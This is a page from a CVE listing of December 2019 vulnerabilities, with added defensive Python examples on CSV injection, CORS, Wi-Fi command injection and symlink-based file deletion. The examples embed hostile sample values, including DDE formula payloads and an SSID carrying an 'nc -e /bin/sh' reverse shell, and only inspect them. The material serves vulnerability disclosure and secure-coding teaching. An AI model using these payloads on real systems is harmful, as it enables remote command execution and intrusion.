CVEdetails.com the ultimate security vulnerability data source

Security Vulnerabilities Published In December 2019

# CVE ID CWE ID # of Exploits Vulnerability Type(s) Publish Date Update Date Score Gained Access Level Access Complexity Authentication Conf. Integ. Avail.
1251 CVE-2019-4716 22 Exec Code Dir. Trav. 2019-12-18 2020-08-24
10.0
None Remote Low Not required Complete Complete Complete
IBM Planning Analytics 2.0.0 through 2.0.8 is vulnerable to a configuration overwrite that allows an unauthenticated user to log in as "admin" and then execute code as root or SYSTEM via TM1 scripting. IBM X-Force ID: 172094.
1252 CVE-2019-4715 20 Exec Code 2019-12-11 2021-07-21
9.0
None Remote Low ??? Complete Complete Complete
IBM Spectrum Scale 4.2 and 5.0 could allow a remote authenticated attacker to execute arbitrary commands on the system. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. IBM X-Force ID: 172093.
1253 CVE-2019-4665 79 XSS 2019-12-11 2019-12-12
3.5
None Remote Medium ??? None Partial None
IBM Spectrum Scale 4.2 and 5.0 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 171247.
1254 CVE-2019-4663 79 XSS 2019-12-10 2019-12-10
3.5
None Remote Medium ??? None Partial None
IBM WebSphere Application Server - Liberty is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 171245.
1255 CVE-2019-4655 20 DoS 2019-12-30 2021-07-21
4.0
None Remote Low ??? None None Partial
IBM MQ 9.1.0.0, 9.1.0.1, 9.1.0.2, 9.1.0.3, 9.1.1, 9.1.2, and 9.1.3 are vulnerable to a denial of service attack that would allow an authenticated user to reset client connections due to an error within the Data Conversion routine. IBM X-Force ID: 170966.
1256 CVE-2019-4623 79 XSS 2019-12-30 2020-01-03
3.5
None Remote Medium ??? None Partial None
IBM Cognos Analytics 11.0 and 11.1 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 168924.
1257 CVE-2019-4621 1188 2019-12-09 2019-12-17
6.8
None Remote Medium Not required Partial Partial Partial
IBM DataPower Gateway 7.6.0.0 through 7.6.0.14 and 2018.4.1.0 through 2018.4.1.5 have a default administrator account that is enabled if the IPMI LAN channel is enabled. A remote attacker could use this account to gain unauthorised access to the BMC. IBM X-Force ID: 168883.
1258 CVE-2019-4612 434 2019-12-09 2019-12-11
6.5
None Remote Low ??? Partial Partial Partial
IBM Planning Analytics 2.0 is vulnerable to malicious file upload in the My Account Portal. An attacker can upload malicious executable files to the system and then deliver them to victims for further attacks. IBM X-Force ID: 168523.
1259 CVE-2019-4611 79 XSS 2019-12-09 2019-12-11
3.5
None Remote Medium ??? None Partial None
IBM Planning Analytics 2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 168519.
1260 CVE-2019-4609 327 2019-12-18 2020-08-24
5.0
None Remote Low Not required Partial None None
IBM API Connect 2018.4.1.7 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 168510.
1261 CVE-2019-4606 426 Exec Code 2019-12-12 2019-12-16
6.9
None Local Medium Not required Complete Complete Complete
IBM DB2 High Performance Unload for LUW 6.1 and 6.5 could allow a local attacker to execute arbitrary code on the system, caused by an untrusted search path vulnerability. By planting an executable file in the search path, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 168298.
1262 CVE-2019-4560 20 DoS 2019-12-16 2021-07-21
4.0
None Remote Low ??? None None Partial
IBM MQ and IBM MQ Appliance 9.1 CD, 9.1 LTS, 9.0 LTS, and 8.0 are vulnerable to a denial of service attack caused by channels processing poorly formatted messages. IBM X-Force ID: 166357.
1263 CVE-2019-4555 79 XSS 2019-12-20 2020-03-17
3.5
None Remote Medium ??? None Partial None
IBM Cognos Analytics 11.0 and 11.1 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 166204.
1264 CVE-2019-4521 1236 Exec Code 2019-12-10 2020-08-24
10.0
None Remote Low Not required Complete Complete Complete
Platform System Manager in IBM Cloud Pak System 2.3 is potentially vulnerable to CSV injection. A remote attacker could execute arbitrary commands on the system, caused by improper validation of CSV file contents. IBM X-Force ID: 165179.
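CSV injection (CWE-1236) is about cells that a downstream consumer evaluates instead of displaying: a leading =, +, -, @ (or a tab or carriage return) turns a cell into a formula in Excel and LibreOffice, and an importer that hands such cells to a shell or a report generator has the same problem in the other direction. The following Python is an added example, not IBM's code and not derived from the Cloud Pak System report; it shows an ingest-side scanner for uploaded CSV and an export-side neutralizer, run over a constructed sample upload.

```python
"""Formula (CSV) injection: detect it in uploaded CSV and neutralize it on export."""
import csv
import io
from typing import Any, List, Tuple

# Leading characters that make Excel / LibreOffice evaluate a cell as a formula;
# tab and carriage return let a payload break out of a quoted cell in some importers.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_cell(value: str) -> bool:
    """True if a spreadsheet would evaluate this cell instead of displaying it."""
    return value.startswith(FORMULA_TRIGGERS)


def find_formula_cells(csv_text: str) -> List[Tuple[int, int, str]]:
    """Scan an uploaded CSV and return (row, column, value) for each cell that
    would be evaluated. Code that feeds such cells to a shell, a report
    generator or a spreadsheet should reject the upload or neutralize them."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_cell(cell):
                findings.append((r, c, cell))
    return findings


def neutralize_cell(value: Any) -> Any:
    """Prefix a dangerous string cell with a single quote, which forces text
    interpretation in Excel and LibreOffice. Real numbers and None are returned
    unchanged so that -5 stays numeric."""
    if isinstance(value, str) and is_formula_cell(value):
        return "'" + value
    return value


def export_csv(rows) -> str:
    """Serialize rows with every cell neutralized and quoted; the csv module
    doubles embedded quotes, which also defeats the break-out variant."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(v) for v in row])
    return buf.getvalue()


# Constructed sample upload (not from the IBM report): two cells carry
# DDE-style payloads of the kind used in CSV injection.
SAMPLE_UPLOAD = (
    "hostname,owner\n"
    "web01,alice\n"
    "=cmd|' /C calc'!A0,mallory\n"
    "db02,@SUM(1+1)*cmd|' /C calc'!A0\n"
)

if __name__ == "__main__":
    for r, c, v in find_formula_cells(SAMPLE_UPLOAD):
        print(f"row {r} col {c}: {v!r}")
    print(export_csv([["=HYPERLINK(\"http://attacker.test\")", 42, -5]]))
```

The scanner is deliberately strict: a legitimate value such as a phone number written as "+44 ..." is flagged too, which is the right default for a field that will be used in a command; on the export side the quote prefix costs nothing and is what OWASP recommends.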
1265 CVE-2019-4468 79 XSS 2019-12-03 2019-12-09
3.5
None Remote Medium ??? None Partial None
IBM Cloud Pak System 2.3 and 2.3.0.1 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 163777.
1266 CVE-2019-4467 79 XSS 2019-12-03 2019-12-09
3.5
None Remote Medium ??? None Partial None
IBM Cloud Pak System 2.3 and 2.3.0.1 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 163776.
1267 CVE-2019-4465 269 2019-12-03 2020-08-24
2.1
None Local Low Not required Partial None None
IBM Cloud Pak System 2.3 and 2.3.0.1 allow web pages to be stored locally, where they can be read by another user on the system. IBM X-Force ID: 163774.
1268 CVE-2019-4444 200 +Info 2019-12-16 2020-08-24
2.1
None Local Low Not required Partial None None
IBM API Connect 2018.1 through 2018.4.1.7 Developer Portal's user registration page does not disable password autocomplete. An attacker with access to the browser instance and local system credentials can steal the credentials used for registration. IBM X-Force ID: 163453.
1269 CVE-2019-4428 79 XSS 2019-12-09 2019-12-11
3.5
None Remote Medium ??? None Partial None
IBM Watson Assistant for IBM Cloud Pak for Data 1.0.0 through 1.3.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 162807.
1270 CVE-2019-4426 79 XSS 2019-12-13 2019-12-18
3.5
None Remote Medium ??? None Partial None
The Case Builder component shipped with 18.0.0.1 through 19.0.0.2 and IBM Case Manager 5.1.1 through 5.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 162772.
1271 CVE-2019-4388 79 XSS 2019-12-18 2019-12-23
3.5
None Remote Medium ??? None Partial None
HCL AppScan Source 9.0.3.13 and earlier is susceptible to cross-site scripting (XSS) attacks by allowing users to embed arbitrary JavaScript code in the Web UI.
1272 CVE-2019-4343 863 2019-12-30 2020-08-24
4.0
None Remote Low ??? Partial None None
IBM Cognos Analytics 11.0 and 11.1 allow overly permissive cross-origin resource sharing, which could let an attacker transfer private information. An attacker could exploit this vulnerability to access content that should be restricted. IBM X-Force ID: 161422.
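"Overly permissive CORS" (CWE-863 here) almost always means one of three things: the server reflects whatever Origin it receives, it grants the "null" origin, or it matches origins by suffix, and in each case Access-Control-Allow-Credentials: true turns a harmless misconfiguration into a cross-site read of authenticated content. The Python below is an added example and has nothing to do with Cognos specifically: a checker that classifies a response's CORS headers for a given request Origin, beside the suffix-match pattern that produces the bug and an exact-match allowlist that does not. TRUSTED_ORIGINS and the example.com hostnames are assumptions for the demonstration.

```python
"""Overly permissive CORS: recognise it from response headers, and the right
way to build them. Added example; not IBM's code or configuration."""
from typing import Dict, List, Set

# Assumption: the application's own origins, matched exactly, scheme included.
TRUSTED_ORIGINS: Set[str] = {"https://app.example.com", "https://admin.example.com"}


def cors_findings(request_origin: str, headers: Dict[str, str]) -> List[str]:
    """Problems with the CORS headers a server returned for a request that
    carried request_origin in its Origin header. Header names are matched
    case-insensitively; an empty list means the grant is acceptable."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    problems: List[str] = []
    if acao is None:
        return problems  # no cross-origin grant at all
    reflected_untrusted = acao == request_origin and request_origin not in TRUSTED_ORIGINS
    if acao == "null":
        problems.append("'null' origin granted; sandboxed iframes and local files send it")
    elif reflected_untrusted:
        problems.append(f"untrusted origin reflected: {request_origin}")
    if creds and (acao == "null" or reflected_untrusted):
        problems.append("Allow-Credentials: true lets that origin read authenticated responses")
    if creds and acao == "*":
        problems.append("'*' with Allow-Credentials: true (browsers refuse it, but the intent is wrong)")
    return problems


def cors_headers_suffix_match(request_origin: str) -> Dict[str, str]:
    """The pattern behind most 'overly permissive' findings: 'ends with our
    domain' also accepts https://evilexample.com."""
    if request_origin.endswith("example.com"):
        return {"Access-Control-Allow-Origin": request_origin,
                "Access-Control-Allow-Credentials": "true"}
    return {}


def cors_headers_allowlist(request_origin: str) -> Dict[str, str]:
    """Exact match against a fixed set; Vary: Origin keeps caches from serving
    one origin's grant to another."""
    if request_origin in TRUSTED_ORIGINS:
        return {"Access-Control-Allow-Origin": request_origin,
                "Access-Control-Allow-Credentials": "true",
                "Vary": "Origin"}
    return {}


if __name__ == "__main__":
    attacker = "https://evilexample.com"  # constructed attacker origin
    print(cors_findings(attacker, cors_headers_suffix_match(attacker)))
    print(cors_findings(attacker, cors_headers_allowlist(attacker)))
```

When testing a live application, send the same request with an Origin you control and with Origin: null, then feed the response headers to cors_findings; a reflected origin with credentials is the finding that matters, a bare "*" without credentials is usually intentional for public, unauthenticated resources.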
1273 CVE-2019-4335 522 2019-12-30 2020-08-24
2.1
None Local Low Not required Partial None None
IBM Watson Studio Local 1.2.3 stores key files in the user's home directory which could be obtained by another local user. IBM X-Force ID: 161413.
1274 CVE-2019-4244 306 2019-12-10 2019-12-13
6.4
None Remote Low Not required Partial Partial None
IBM SmartCloud Analytics 1.3.1 through 1.3.5 could allow a remote attacker to gain unauthorized information and unrestricted control over Zookeeper installations due to missing authentication. IBM X-Force ID: 159518.
1275 CVE-2019-4231 352 CSRF 2019-12-20 2020-01-03
4.3
None Remote Medium Not required None Partial None
IBM Cognos Analytics 11.0 and 11.1 are vulnerable to cross-site request forgery, which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 159356.
1276 CVE-2019-4226 79 XSS 2019-12-03 2019-12-11
3.5
None Remote Medium ??? None Partial None
IBM Cloud Pak System 2.3 and 2.3.0.1 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 159243.
1277 CVE-2019-4130 434 Exec Code 2019-12-03 2019-12-09
6.5
None Remote Low ??? Partial Partial Partial
IBM Cloud Pak System 2.3 and 2.3.0.1 could allow a remote attacker to upload arbitrary files, which could allow the attacker to execute arbitrary code on the vulnerable server. IBM X-Force ID: 158280.
1278 CVE-2019-4098 79 XSS 2019-12-03 2019-12-09
3.5
None Remote Medium ??? None Partial None
IBM Cloud Pak System 2.3 and 2.3.0.1 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 158020.
1279 CVE-2019-4095 352 CSRF 2019-12-10 2019-12-13
4.3
None Remote Medium Not required None Partial None
IBM Cloud Pak System 2.3 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 158015.
1280 CVE-2019-3996 610 2019-12-17 2020-01-24
7.5
None Remote Low Not required Partial Partial Partial
ELOG 3.1.4-57bea22 and below can be used as an HTTP GET request proxy when unauthenticated remote attackers send crafted HTTP POST requests.
1281 CVE-2019-3995 476 DoS 2019-12-17 2020-01-24
5.0
None Remote Low Not required None None Partial
ELOG 3.1.4-57bea22 and below is affected by a denial of service vulnerability due to a NULL pointer dereference. A remote unauthenticated attacker can crash the ELOG server by sending a crafted HTTP GET request.
1282 CVE-2019-3994 416 DoS 2019-12-17 2020-01-24
5.0
None Remote Low Not required None None Partial
ELOG 3.1.4-57bea22 and below is affected by a denial of service vulnerability due to a use after free. A remote unauthenticated attacker can crash the ELOG server by sending multiple HTTP POST requests which causes the ELOG function retrieve_url() to use a freed variable.
1283 CVE-2019-3993 319 2019-12-17 2020-10-15
5.0
None Remote Low Not required Partial None None
ELOG 3.1.4-57bea22 and below is affected by an information disclosure vulnerability. A remote unauthenticated attacker can recover a user's password hash by sending a crafted HTTP POST request.
1284 CVE-2019-3992 319 2019-12-17 2020-10-15
5.0
None Remote Low Not required Partial None None
ELOG 3.1.4-57bea22 and below is affected by an information disclosure vulnerability. A remote unauthenticated attacker can access the server's configuration file by sending an HTTP GET request. Amongst the configuration data, the attacker may gain access to valid admin usernames and, in older versions of ELOG, passwords.
1285 CVE-2019-3990 269 Bypass +Info 2019-12-03 2020-08-24
4.0
None Remote Low ??? Partial None None
A user enumeration flaw exists in Harbor. The issue is present in the "/users" API endpoint, which is supposed to be restricted to administrators. This restriction can be bypassed, and information about registered users can be obtained via the "search" functionality.
1286 CVE-2019-3989 78 Exec Code 2019-12-11 2019-12-13
9.3
None Remote Medium Not required Complete Complete Complete
Blink XT2 Sync Module firmware prior to 2.13.11 allows remote attackers to execute arbitrary commands on the device due to improperly sanitized input when retrieving internal network configuration data.
1287 CVE-2019-3988 78 Exec Code 2019-12-11 2019-12-13
8.3
None Local Network Low Not required Complete Complete Complete
Blink XT2 Sync Module firmware prior to 2.13.11 allows remote attackers to execute arbitrary commands on the device due to improperly sanitized input when configuring the device's Wi-Fi settings via the bssid parameter.
1288 CVE-2019-3987 78 Exec Code 2019-12-11 2019-12-13
8.3
None Local Network Low Not required Complete Complete Complete
Blink XT2 Sync Module firmware prior to 2.13.11 allows remote attackers to execute arbitrary commands on the device due to improperly sanitized input when configuring the device's Wi-Fi settings via the key parameter.
1289 CVE-2019-3986 78 Exec Code 2019-12-11 2019-12-13
8.3
None Local Network Low Not required Complete Complete Complete
Blink XT2 Sync Module firmware prior to 2.13.11 allows remote attackers to execute arbitrary commands on the device due to improperly sanitized input when configuring the device's Wi-Fi settings via the encryption parameter.
1290 CVE-2019-3985 78 Exec Code 2019-12-11 2019-12-13
8.3
None Local Network Low Not required Complete Complete Complete
Blink XT2 Sync Module firmware prior to 2.13.11 allows remote attackers to execute arbitrary commands on the device due to improperly sanitized input when configuring the device's Wi-Fi settings via the ssid parameter.
1291 CVE-2019-3984 78 Exec Code 2019-12-31 2020-08-24
10.0
None Remote Low Not required Complete Complete Complete
Blink XT2 Sync Module firmware prior to 2.13.11 allows remote attackers to execute arbitrary commands on the device due to improperly sanitized input when the device retrieves updates scripts from the internet.
1292 CVE-2019-3983 798 Exec Code 2019-12-11 2020-08-24
7.2
None Local Low Not required Complete Complete Complete
Blink XT2 Sync Module firmware prior to 2.13.11 allows attackers with local (UART) access to execute arbitrary code and commands on the device due to insufficient UART protections.
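The four Blink CVEs above (ssid, bssid, key, encryption) are one bug class, OS command injection (CWE-78): a value from the configuration request is spliced into a shell command line, so a value containing ";" or "|" runs a second command. The Python below is an added example, not Blink firmware and not the researchers' exploit; the wpa_passphrase command line, the SSID payload and the length limits are assumptions chosen to illustrate the class. It shows the vulnerable string-building pattern, a tokeniser that reveals which programs a POSIX shell would actually run for such a line, and the fix: validate against the protocol's own limits and pass values as separate argv entries so no shell parses them.

```python
"""OS command injection via Wi-Fi settings: the vulnerable pattern, how a shell
would read it, and the argv-based replacement. Added example, not vendor code."""
import re
import shlex
import subprocess
from typing import List

SEPARATORS = {";", "&&", "||", "|", "&"}


def wifi_command_unsafe(ssid: str, key: str) -> str:
    """The bug class: user-controlled values spliced into a shell command line.
    Returned as a string rather than executed so the effect can be inspected."""
    return f"wpa_passphrase {ssid} {key} > /tmp/wpa.conf"


def commands_in(cmdline: str) -> List[str]:
    """Names of the programs a POSIX shell would run for this line.
    shlex with punctuation_chars splits ; | & into their own tokens, so an
    injected second command shows up right after a separator."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    names: List[str] = []
    expect_name = True
    for tok in lexer:
        if tok in SEPARATORS:
            expect_name = True
        elif expect_name and tok not in ("(", ")", "<", ">"):
            names.append(tok)
            expect_name = False
    return names


# 802.11 limits an SSID to 32 octets; a WPA2 passphrase is 8-63 printable ASCII.
SSID_RE = re.compile(r"[\x20-\x7e]{1,32}")
PSK_RE = re.compile(r"[\x20-\x7e]{8,63}")


def wifi_argv_safe(ssid: str, key: str) -> List[str]:
    """Validate against the protocol's own limits, then keep each value in its
    own argv slot: no shell parses it, so metacharacters stay data."""
    if not SSID_RE.fullmatch(ssid) or not PSK_RE.fullmatch(key):
        raise ValueError("ssid or key outside the 802.11/WPA2 limits")
    return ["wpa_passphrase", ssid, key]


def argv_as_shell_line(argv: List[str]) -> str:
    """If an argv ever has to be rendered for a shell, shlex.join quotes each
    element, so separators inside a value stay inside it."""
    return shlex.join(argv)


def write_wpa_conf(ssid: str, key: str, path: str = "/tmp/wpa.conf") -> None:
    """The fixed configuration step: subprocess without shell=True, with the
    output redirect done by the parent instead of by a shell."""
    with open(path, "wb") as out:
        subprocess.run(wifi_argv_safe(ssid, key), stdout=out, check=True)


if __name__ == "__main__":
    payload = "MyNet; nc -e /bin/sh 10.0.0.1 4444"  # constructed attacker SSID
    print(commands_in(wifi_command_unsafe(payload, "secret123")))
    print(commands_in(argv_as_shell_line(["wpa_passphrase", "x; nc 1.2.3.4 4", "secret123"])))
```

Note that the length check alone is not the fix: a 15-byte SSID such as "x; nc 1.2.3.4 4" passes validation and is still a perfectly legal SSID. What makes it harmless is that it arrives in wpa_passphrase's argv as a single argument; commands_in(argv_as_shell_line(...)) shows that even a shell rendering of that argv runs only one program.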
1293 CVE-2019-3951 787 DoS Exec Code Overflow Mem. Corr. 2019-12-12 2019-12-18
7.5
None Remote Low Not required Partial Partial Partial
Advantech WebAccess before 8.4.3 allows unauthenticated remote attackers to execute arbitrary code or cause a denial of service (memory corruption) due to a stack-based buffer overflow when handling IOCTL 70533 RPC messages.
1294 CVE-2019-3750 59 2019-12-03 2019-12-10
3.6
None Local Low Not required None Partial Partial
Dell Command Update versions prior to 3.1 contain an arbitrary file deletion vulnerability. A local authenticated user with low privileges could exploit it to delete arbitrary files by creating a symlink from "Temp\IC\ICDebugLog.txt" to any targeted file. The issue occurs because permissions on the Temp directory were set incorrectly.
1295 CVE-2019-3749 59 2019-12-03 2019-12-10
3.6
None Local Low Not required None Partial Partial
Dell Command Update versions prior to 3.1 contain an arbitrary file deletion vulnerability. A local authenticated user with low privileges could exploit it to delete arbitrary files by creating a symlink from "Temp\ICProgress\Dell_InventoryCollector_Progress.xml" to any targeted file. The issue occurs because permissions on the Temp directory were set incorrectly.
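The two Dell entries above, and the chkstat entry that follows, share a root cause (CWE-59): a privileged process operates on a path inside a directory a low-privileged user can write to, and a link planted there redirects the operation. The Python below is an added example on POSIX, not Dell's code and not the Windows exploit (on Windows the redirection is done with junctions and object-manager symlinks; on POSIX the closest analogue is a symlinked parent directory, which sends the delete into a directory of the attacker's choosing). It builds the layout in a scratch directory, shows the naive cleanup deleting a file it was never meant to touch, and contrasts a deletion routine that walks the path with O_NOFOLLOW and dir_fd so that a planted link fails the open instead of redirecting the unlink. The directory and file names are constructed for the demo.

```python
"""Arbitrary file deletion through a planted symlink, and a deletion routine
that refuses to follow links. Added example (POSIX), not vendor code."""
import errno
import os
import shutil
import stat
import tempfile


def naive_cleanup(log_path: str) -> None:
    """Privileged cleanup as usually written: whatever the path resolves to
    through symlinked parent directories, the file at the end is unlinked."""
    os.remove(log_path)


def safe_unlink(base_dir: str, *components: str) -> None:
    """Unlink base_dir/<components...> without following any symlink.

    Each directory is opened relative to the previous one with O_NOFOLLOW, so
    a component replaced by a link (even between a check and the unlink) makes
    the open fail with ELOOP instead of redirecting the delete. The leaf is
    refused too: a link where a log file should be means someone is tampering."""
    flags = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW
    fd = os.open(base_dir, flags)
    try:
        for name in components[:-1]:
            nxt = os.open(name, flags, dir_fd=fd)  # ELOOP if name is a symlink
            os.close(fd)
            fd = nxt
        leaf = components[-1]
        if stat.S_ISLNK(os.lstat(leaf, dir_fd=fd).st_mode):
            raise OSError(errno.ELOOP, "refusing to unlink a symlink", leaf)
        os.unlink(leaf, dir_fd=fd)
    finally:
        os.close(fd)


def run_demo() -> dict:
    """Build the layout in a scratch directory and run both routines.
    Temp/ stands in for the world-writable temp directory, protected/ for a
    directory the low-privileged user cannot touch directly."""
    root = tempfile.mkdtemp(prefix="symlink-demo-")
    try:
        protected = os.path.join(root, "protected")
        temp = os.path.join(root, "Temp")
        os.makedirs(protected)
        os.makedirs(temp)
        victim = os.path.join(protected, "ICDebugLog.txt")

        # Attacker step: Temp/IC -> protected, so the service's own log path
        # now points into the protected directory.
        os.symlink(protected, os.path.join(temp, "IC"))
        log_path = os.path.join(temp, "IC", "ICDebugLog.txt")
        result = {}

        open(victim, "w").close()
        naive_cleanup(log_path)
        result["naive_deleted_victim"] = not os.path.exists(victim)

        open(victim, "w").close()
        try:
            safe_unlink(temp, "IC", "ICDebugLog.txt")
            result["safe_refused"] = False
        except OSError:
            result["safe_refused"] = True
        result["victim_survived_safe"] = os.path.exists(victim)

        # Legitimate case: a real directory and file are still cleaned up.
        os.makedirs(os.path.join(temp, "Real"))
        real_log = os.path.join(temp, "Real", "ICDebugLog.txt")
        open(real_log, "w").close()
        safe_unlink(temp, "Real", "ICDebugLog.txt")
        result["safe_deletes_real_file"] = not os.path.exists(real_log)
        return result
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(run_demo())
```

The stronger fix is the one Dell's advisory implies: do not let low-privileged users write into the directory at all (correct permissions, or a per-service directory created with a restrictive mode). The link-refusing walk is the defence for the case where the directory has to stay shared.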
1296 CVE-2019-3690 59 2019-12-05 2020-11-20
7.2
None Local Low Not required Complete Complete Complete
The chkstat tool in the permissions package followed symlinks before commit a9e1d26cd49ef9ee0c2060c859321128a6dd4230 (please also check the additional hardenings after this fix). This allowed local attackers with control over a path that is traversed by chkstat to escalate privileges.
1297 CVE-2019-3667 427 Exec Code 2019-12-11 2019-12-16
4.4
None Local Medium Not required Partial Partial Partial
DLL search order hijacking vulnerability in the Microsoft Windows client in McAfee Tech Check 3.0.0.17 and earlier allows local users to execute arbitrary code via a malicious DLL placed in the local folder by an attacker.
1298 CVE-2019-3666 2019-12-03 2019-12-12
4.3
None Remote Medium Not required None Partial None
API abuse/misuse vulnerability in the web interface in McAfee Web Advisor (WA) prior to 4.1.1.48 allows a remote unauthenticated attacker to make the browser navigate to restricted websites via a carefully crafted website.
1299 CVE-2019-3665 94 2019-12-03 2019-12-11
4.3
None Remote Medium Not required None Partial None
Code injection vulnerability in the web interface in McAfee Web Advisor (WA) prior to 4.1.1.48 allows a remote unauthenticated attacker to make the browser render a website that Web Advisor would normally have blocked, via a carefully crafted website.
1300 CVE-2019-3467 732 2019-12-23 2020-09-25
7.2
None Local Low Not required Complete Complete Complete
debian-edu-config versions before 2.11.10, a set of configuration files used for Debian Edu, and debian-lan-config before 0.26 configure overly permissive ACLs for the Kerberos admin server, which allow password changes for other Kerberos user principals.
Total number of vulnerabilities: 1577 (page 26 of 32)